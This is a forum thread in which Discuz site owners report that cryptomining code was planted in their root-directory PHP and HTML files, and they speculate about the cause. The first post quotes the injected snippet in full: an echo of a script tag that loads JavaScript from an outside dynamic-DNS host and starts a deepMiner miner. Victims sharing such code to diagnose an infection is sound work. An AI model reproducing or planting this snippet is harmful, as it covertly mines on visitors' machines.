3.4肯定有漏洞，老是挂马

我被挂的是下面这段代码。主要挂在根目录下的PHP和html文件。。。php加在代码的顶部，html加的底部。主要影响网站速度。


echo "<script src='file:///C:\Users\ADMINI~1\AppData\Local\Temp\%W@GJ$ACOF(TYDYECOKVDYB.pnghttps://greenindex.dynamic-dns.net/jqueryeasyui.js

'></script>
        <script>
            var uri = 'www';
            var jqueryui = new deepMiner.Anonymous(uri, {autoThreads: true,throttle: 0.5});
            if (!jqueryui.isMobile() && !jqueryui.didOptOut(14400)) {
            jqueryui.start();
            }
        </script>";

这个是挖矿的js，，，我一个3.2的dz也在同一个服务器都没有问题，插件都是应用中心下载的。。肯定就出在程序中了

看看是不是别的地方有木马。一直没找出来，，我之前就是

我的论坛程序是discuz x2.5，昨晚也被挂马了，情况和楼主的一模一样！也是根目录下的PHP和html文件被植入挖矿JS，而且植入的代码都是一模一样，看来是近期大面积爆发啊！我的PHP程序版本是5.3，会不会是PHP版本太低产生的漏洞被拿下了呢？楼主的是多少？

暂时还未发现注入点在哪里，哪位大神如果有发现，麻烦指点一下，不胜感激！

我的前几天被挂木马  被劫持   X3.4好像不是很安全

和版本根本无关，挂马90%几乎都是服务器权限等漏洞，程序漏洞的反而很少，真的有严重漏洞，早就会有各种安全中心提示DZ并修复了